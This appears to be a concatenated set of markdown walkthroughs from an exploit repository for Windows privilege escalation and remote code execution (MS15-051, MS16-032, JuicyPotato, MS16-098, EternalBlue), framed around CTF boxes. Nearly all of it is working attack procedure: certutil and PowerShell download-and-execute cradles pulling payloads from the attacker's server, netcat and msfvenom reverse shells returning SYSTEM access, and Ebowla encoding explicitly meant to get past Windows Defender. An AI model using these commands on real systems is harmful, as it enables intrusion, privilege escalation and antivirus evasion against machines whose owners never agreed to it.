21 | Alternatively, you can host the file from your local machine using python SimpleHTTPServer, upload it to the target machine using certutil.exe and then execute the program. 22 | 23 | ```sh 24 | certutil.exe -urlcache -f -split "http://:8000/Chimichurri.exe" Chimichurri.exe 25 | Chimichurri.exe 9001 26 | 27 | ``` 28 | if you didn't know about certutil.exe, then I highly recommend to checkout [LOLBAS](https://lolbas-project.github.io/#) for cool binaries in windows that can be taken advantage of to do various kinds of stuffs. -------------------------------------------------------------------------------- /ms15-051.md: -------------------------------------------------------------------------------- 1 | | CVE / MS | Title | Vulns | 2 | | --------- | ----- | ----- | 3 | | CVE-2015-1701 / MS15-051 | ClientCopyImage Win32k | win_vista sp_2 arc_x64,win_8 arc_x64,win_server_2008 sp_2 arc_x64,win_8 arc_x86,win_server_2012 arc_x86,win_server_2003 sp_2 arc_x64,win_server_2008 sp_1 arc_x64,win_8.1 arc_x86,win_8.1 arc_x64,win_10 sp_1 arc_x86,win_server_2008 sp_2 arc_x86,win_vista sp_2 arc_x86,win_server_2003 sp_2 arc_x86,win_10 sp_1 arc_x64,win_server_2008 sp_1 arc_x86 | 4 | 5 |

6 | 7 | 8 | Download the [MS15-051-KB3045171.zip](https://github.com/SecWiki/windows-kernel-exploits/raw/master/MS15-051/MS15-051-KB3045171.zip 9 | ) file and extract. Depending on target OS structure use ms15-051.exe or ms15-051x64.exe. In my case I used ms15-051x64.exe on a Windows 2008 R2 x64 target.
10 | Start a samba server on your local machine using impacket-smbserver 11 | 12 | ```sh 13 | sudo impacket-smbserver myshare `pwd` -smb2 14 | ``` 15 | 16 | We can directly execute the file from the smb server. The exe takes any command as argument and executes it, we'll send a reverse shell back to us as System! first copy a netcat binary exe to your smbserver directory so that we can access that as well. Next we start a netcat listener to catch the System shell on port 9001 because a great Prince once said, [its Over 9000!](https://www.youtube.com/watch?v=SiMHTK15Pik)
Then we execute the following on target shell : 17 | 18 | ```sh 19 | \\\myshare\ms15-051x64.exe "\\\myshare\nc64.exe 9001 -e cmd" 20 | ``` 21 | note: make sure the binary exe file names are same as your files in your local directory.
22 | Alternatively, we can upload the exe to the target system first and execute. Now you have a System Shell! Enjoy! -------------------------------------------------------------------------------- /ms16-032.md: -------------------------------------------------------------------------------- 1 | | CVE / MS | Title | Vulns | 2 | | --------- | ----- | ----- | 3 | | CVE-2016-0099 / MS16-032 | Secondary Logon Handle Privilege Escalation | win_server_2008 sp_2 arc_x64,win_server_2008 sp_1 arc_x64,win_10 arc_x64,win_vista sp_2 arc_x86,win_10 version_1511 arc_x86,win_server_2012 arc_x86,win_7 sp_1 arc_x64,win_10 version_1511 arc_x64,win_server_2008 sp_2 arc_x86,win_10 arc_x86,win_8.1 arc_x86,win_vista sp_2 arc_x64,win_8.1 arc_x64,win_7 sp_1 arc_x86,win_server_2008 sp_1 arc_x86 | 4 | 5 |

6 | 7 | 8 | First get a Powershell reverse shell on target system. 9 | Then download this : [Invoke-MS16032.ps1](https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-MS16032.ps1) file in your local system, edit the file and add this below line at the bottom of the script : 10 | 11 | ```sh 12 | Invoke-MS16032 -Command "iex(New-Object Net.WebClient).DownloadString('http://:8000/Invoke-PowerShellTcp.ps1')" 13 | ``` 14 | 15 | Save it and download this : [Invoke-PowerShellTcp.ps1](https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1) file in local system, edit the file and add this below line at the bottom of the script : 16 | 17 | ```sh 18 | Invoke-PowerShellTcp -Reverse -IPAddress -Port 9000 19 | ``` 20 | 21 | Save it. make sure both files are in the same directory and start a python SimpleHTTPServer on port 8000. 22 | Open another terminal and start a netcat listener on port 9000, we will receive System shell here later. 23 | Then inside our Powershell reverse shell execute the following : 24 | 25 | ```sh 26 | IEX (New-Object Net.WebClient).DownloadString('http://:8000/Invoke-MS16032.ps1') 27 | ``` 28 | wait a few seconds and a System shell will be sent to your netcat listener! 29 | The exploit chain oversimplified : 30 | 31 | * requests your python server 32 | * downloads Invoke-MS16032.ps1 33 | * exploitation and get system process 34 | * requests your python server 35 | * downloads Invoke-PowerShellTcp.ps1 from system process 36 | * invokes reverse tcp shell and connect to your netcat listener as system. -------------------------------------------------------------------------------- /ms16-075.md: -------------------------------------------------------------------------------- 1 | | CVE / MS | Title | Vulns | 2 | | --------- | ----- | ----- | 3 | | MS16-075 | Rotten Potato – Privilege Escalation from Service Accounts to SYSTEM (JuicyPotato) | win_server_2008 sp_2 arc_x64,win_server_2008 sp_1 arc_x64,win_10 arc_x64,win_vista sp_2 arc_x86,win_10 version_1511 arc_x86,win_server_2012 arc_x86,win_7 sp_1 arc_x64,win_10 version_1511 arc_x64,win_server_2008 sp_2 arc_x86,win_10 arc_x86,win_8.1 arc_x86,win_vista sp_2 arc_x64,win_8.1 arc_x64,win_7 sp_1 arc_x86,win_server_2008 sp_1 arc_x86 | 4 | 5 |

6 | 7 | 8 | I could not find a relevant CVE for this exploit yet. By the time I learned about this exploit which was originally developed in 2016, there were already many variations of the Potato exploit in 2019 e.g RottenPotatoNG, LonelyPotato, JuicyPotato.
I'll be demonstrating JuicyPotato which I think is the most stable and has high success chance among all other Potatoes.
The mentioned Affected Systems were auto generated through the MSBulletin link but really the exploit seems to work on any machine where the user has "SeImpersonatePrivilege" or "SeAssignPrimaryTokenPrivilege" Privilege.
Check if they are available using command : whoami /priv
9 |

Generating program to run by the JuicyPotato

10 | Choose either one of these : 11 | 15 |

Simple bat script to execute Invoke-PowerShellTcp.ps1 :

16 | 17 | Download [Invoke-PowerShellTcp.ps1](https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1) file in local system, edit the file and add this below line at the bottom of the script : 18 | 19 | ```sh 20 | Invoke-PowerShellTcp -Reverse -IPAddress -Port 443 21 | ``` 22 | 23 | create a file named `rev.bat` and add this as its content : 24 | 25 | ```sh 26 | powershell.exe -c iex(new-object net.webclient).downloadstring(':8000/Invoke-PowerShellTcp.ps1') 27 | ``` 28 | 29 |

MSF reverse shell backdoor :

30 | I am demonstrating this POC against a Windows Server 2016 10.0.14393 x64-based OS so if your target is x86-based then change the commands where necessary.
First we'll generate a reverse shell backdoor exe using msfvenom : 31 | 32 | ```sh 33 | msfvenom -f exe -p windows/x64/shell_reverse_tcp LHOST= LPORT=443 -a x64 -o rev.exe 34 | 35 | ``` 36 | 37 |

- - - - - - - - - - [OPTIONAL] - - - - - - - - - -

38 | 39 | This binary will be immediately deleted on a windows 10 or server 2016 box if Windows Defender is active. So we can obfuscate the exe by encoding it with a tool named "Ebowla" ( now deprecated but still works! ) to bypass it. Requires Go, Python 2 and Pip 40 | 41 | ```sh 42 | git clone https://github.com/Genetic-Malware/Ebowla.git 43 | pip install configobj 44 | ``` 45 | 46 | The tool is ready to be used. Now edit the "genetic.config" file inside the Ebowla directory, find and change the following Variables : 47 | 48 | ```sh 49 | Encryption_Type = ENV 50 | output_type = GO 51 | payload_type = EXE 52 | ``` 53 | 54 | Find the [[ENV_VAR]] section. Set the value of the "computername" variable to the output of "hostname" command on your target machine. Suppose mine is 'tally' so I am putting it like this : 55 | 56 | ```sh 57 | username = '' 58 | computername = 'tally' 59 | homepath = '' 60 | homedrive = '' 61 | Number_of_processors = '' 62 | processor_identifier = '' 63 | processor_revision = '' 64 | userdomain = '' 65 | systemdrive = '' 66 | userprofile = '' 67 | path = '' 68 | temp = '' 69 | ``` 70 | 71 | Leave other variables mentioned above blank and rest of the variables default, save and exit. 72 | Now copy the rev.exe file in the Ebowla directory and execute : 73 | 74 | ```sh 75 | python ebowla.py rev.exe genetic.config 76 | 77 | ./build_x64_go.sh output/go_symmetric_rev.exe.go revx.exe 78 | ``` 79 | 80 | This produced an encoded version of the original exe program on output/revx.exe which won't get deleted if the Windows Defender is active on the box. 81 | 82 |

- - - - - - - - - - [/OPTIONAL] - - - - - - - - - -

83 | 84 | Start a netcat listener on your local machine to receive reverse shell as System later: 85 | 86 | ```sh 87 | sudo nc -nlvp 443 88 | ``` 89 | 90 | Now download JuicyPotato.exe matching your target: 91 | 92 | * [x64 JuicyPotato](https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe) 93 | * [x86 JuicyPotato](https://github.com/ivanitlearning/Juicy-Potato-x86/releases) 94 | 95 | put both JuicyPotato.exe and the rev.bat/revx.exe in a directory and start a python SimpleHTTPServer. change the revx.exe to rev.bat from the below command before executing if you chose the go with the .bat program earlier: 96 | 97 | ```sh 98 | powershell (New-Object Net.WebClient).DownloadFile('http://:8000/JuicyPotato.exe' , 'C:\Users\Public\JuicyPotato.exe') 99 | 100 | powershell (New-Object Net.WebClient).DownloadFile('http://:8000/revx.exe' , 'C:\Users\Public\revx.exe') 101 | 102 | C:\Users\Public\JuicyPotato.exe -t * -l 1337 -p C:\Users\Public\revx.exe 103 | 104 | ``` 105 | 106 | If everything went well you should receive a reverse shell connection on your netcat listener now. if the exploit failed and you see something like : 107 | 108 | ```sh 109 | Testing {4991d34b-80a1-4291-83b6-3328366b9097} 1337 110 | COM -> recv failed with error: XXXXX 111 | ``` 112 | 113 | Then the default CLSID mentioned in the exploit is not working.
114 |

Finding right CLSID

115 | 116 | * Execute `systeminfo` and get the OS Name, in my case its 'Microsoft Windows 10 Enterprise' 117 | * Go Here : [http://ohpe.it/juicy-potato/CLSID/](http://ohpe.it/juicy-potato/CLSID/) 118 | * Select the Os Name you got, and copy one of the CLSID which is owned by NT AUTHORITY\SYSTEM 119 | 120 |
and the localservice looks like it should be available in the box by default. 121 |

122 | 123 | In my case I selected this CLSID {e60687f7-01a1-40aa-86ac-db1cbf673334} which is from the localservice wuauserv (Windows Update Service) for Windows 10 Enterprise.

124 | Now execute JuicyPotato.exe again with the CLSID included this time : 125 | 126 | ```sh 127 | C:\Users\Public\JuicyPotato.exe -t * -l 1337 -p C:\Users\Public\revx.exe -c '{e60687f7-01a1-40aa-86ac-db1cbf673334}' 128 | ``` 129 | 130 | If everything went well you should receive a reverse shell connection on your netcat listener now. if the exploit failed again this time change the CLSID from one of other from that page and keep trying, one of the CLSID should work and you'll get the reverse shell. 131 | -------------------------------------------------------------------------------- /ms16-098.md: -------------------------------------------------------------------------------- 1 | | CVE / MS | Title | Vulns | 2 | | --------- | ----- | ----- | 3 | | CVE-2016-3309 / MS16-098 | RGNOBJ Integer Overflow on Windows 8.1 x64 bit by abusing GDI objects | win_7 version_1511 arc_x64,win_7 version_1511 arc_x86,win_server_2008 sp_2 arc_x86,win_10 sp_1 arc_x86,win_10 sp_1 arc_x64,win_server_2012 arc_x86,win_7 version_1607 arc_x64,win_vista sp_2 arc_x64,win_8.1 arc_x64,win_server_2008 sp_2 arc_x64,win_7 arc_x64,win_8.1 arc_x86,win_7 arc_x86,win_7 version_1607 arc_x86,win_vista sp_2 arc_x86,win_server_2008 sp_1 arc_x64,win_server_2008 sp_1 arc_x86 | 4 | 5 |

6 | 7 | 8 | Important Note : This POC is only tested on Windows 8.1 x64 and Windows 2012 R2 x64. May not work on others. Do NOT try this POC from a Powershell Reverse Shell. if you are happened to be on a Powershell like I was then upload [netcat](https://github.com/int0x33/nc.exe/raw/master/nc64.exe) binary and send a cmd shell to your local netcat listener : 9 | 10 | ```sh 11 | .\nc64.exe 9000 -e cmd 12 | ``` 13 | 14 | Usually CTF boxes don't connect to Internet links so in that case download POC binary in your local machine from [Here](https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe) then start a python SimpleHTTPServer on port 8000. On the target machine : 15 | 16 | ```sh 17 | certutil.exe -urlcache -split -f "http://:8000/41020.exe" 41020.exe 18 | .\41020.exe 19 | ``` 20 | 21 | If the program didn't hang, check whoami you are already System! Alternatively you can start a samba server on your local machine using impacket-smbserver 22 | 23 | ```sh 24 | sudo impacket-smbserver myshare `pwd` -smb2 25 | ``` 26 | 27 | and run the exe directly from network like this : 28 | 29 | ```sh 30 | \\\myshare\41020.exe 31 | ``` -------------------------------------------------------------------------------- /ms17-010.md: -------------------------------------------------------------------------------- 1 | | CVE / MS | Title | Vulns | 2 | | --------- | ----- | ----- | 3 | | CVE-2017-0144 / MS17-010 | Windows SMB Remote Code Execution (Eternalblue) | win_server_2008 sp_1 arc_x64,win_7 version_1511 arc_x64,win_server_2016 arc_x64,win_7 version_1607 arc_x86,win_server_2008 sp_2 arc_x64,win_server_2008 sp_2 arc_x86,win_7 arc_x64,win_vista sp_2 arc_x86,win_8.1 arc_x86,win_10 sp_1 arc_x64,win_server_2008 sp_1 arc_x86,win_10 sp_1 arc_x86,win_vista sp_2 arc_x64,win_7 version_1607 arc_x64,win_7 arc_x86,win_8.1 arc_x64,win_7 version_1511 arc_x86,win_server_2012 arc_x86 | 4 | 5 |

6 | 7 | 8 | Git clone the following git repository : 9 | 10 | ```sh 11 | git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git 12 | ``` 13 | 14 |
There are 4 Scripts on that repository for different versions of Windows :
15 | 16 | * zzz_exploit.py - this one will directly spawn SYSTEM shell, no need to generate payload. **[Use this first]** 17 | * eternalblue_exploit7.py - Win 7 SP1 x64, Win 2008 R2 SP1 x64, Win 7 SP1 x86, Win 2008 SP1 x64, Win 2008 SP1 x86 18 | * eternalblue_exploit8.py - Win 2012 R2 x64, Win 8.1 x64, Win 10 Pro Build 10240 x64 19 | * eternalblue_exploit10.py - Win 2012 R2 x64, Win 8.1 x64, Win 10 Pro Build 10240 x64 20 | 21 | ### # zzz_exploit.py 22 | 23 | This should work on all targets. Just launch with target IP: 24 | 25 | ```sh 26 | $ python zzz_exploit.py 27 | # output 28 | [*] Target OS: Windows 8.1 Enterprise 9600 29 | [+] Found pipe 'netlogon' 30 | [+] Using named pipe: netlogon 31 | [*] Target is 64 bit 32 | Got frag size: 0x20 33 | GROOM_POOL_SIZE: 0x5030 34 | BRIDE_TRANS_SIZE: 0xf90 35 | CONNECTION: 0xffffe00002935020 36 | SESSION: 0xffffc000041ee050 37 | FLINK: 0xffffc0000700e098 38 | InParam: 0xffffc0000700816c 39 | MID: 0x503 40 | [+] success controlling groom transaction 41 | [*] modify trans1 struct for arbitrary read/write 42 | [*] make this SMB session to be SYSTEM 43 | [*] overwriting session security context 44 | [*] have fun with the system smb session! 45 | [!] Dropping a semi-interactive shell (remember to escape special chars with ^) 46 | [!] Executing interactive programs will hang shell! 47 | C:\Windows\system32>whoami 48 | nt authority\system 49 | 50 | C:\Windows\system32> 51 | ``` 52 | 53 | This version reuses same connection to execute commands. Remember the shell is not interactive. 54 | 55 | ### # eternalblue_exploit[7/8/10].py 56 | 57 | First to prepare exploit payload 58 | 59 | ```sh 60 | cd shellcode && ./shell_prep.sh 61 | ``` 62 | the script will prepare payload for both 32-bit and 64-bit Windows and ask for two listener ports to generate the payload.
63 | Fillup necessary informations asked by the script. It will generate the payload file as **sc_all.bin**
64 | Next start two netcat listeners on the port numbers chosen in the last step in different terminals. 65 | 66 |
NOTE : you need a valid user account to exploit Windows 10 Build 10240 and Windows 2012 R2, they are more like a privesc than RCE. you need to add username password by editing those scripts.
67 | My target was a windows 7 x64 so I used the eternalblue_exploit7.py 68 | 69 | ```sh 70 | python eternalblue_exploit7.py shellcode/sc_all.bin 71 | ``` 72 | 73 | The payload is compatible for both 32-bit and 64-bit Windows so even if you initially don't know the correct edition it will send reverse shell on one of the netcat listeners. 74 | 75 | 76 | 77 | # For Windows XP, Server 2000 : 78 | 79 | First download these two Python2 scripts 80 | 81 | * [send_and_execute.py](https://raw.githubusercontent.com/helviojunior/MS17-010/master/send_and_execute.py) 82 | * [mysmb.py](https://raw.githubusercontent.com/helviojunior/MS17-010/master/mysmb.py)
83 | 84 | These script require `impacket, pycrypto`. They are installed by default in Kali but if you don't have it already then install with : 85 | 86 | ```sh 87 | pip install pycrypto 88 | git clone https://github.com/CoreSecurity/impacket.git 89 | cd impacket && pip install . 90 | ``` 91 | 92 | Next create a binary reverse_shell payload using msfvenom: 93 | 94 | ```sh 95 | msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o rev_shell.exe 96 | ``` 97 | Next start a netcat listener on the port you specified on your msfvenom payload and leave it running.
98 | Now all that's left is to run the script: 99 | 100 | ```sh 101 | python send_and_execute.py rev_shell.exe 102 | ``` 103 | 104 | In a couple of seconds a reverse shell should arrive as System on your netcat listener. 105 | 106 | --------------------------------------------------------------------------------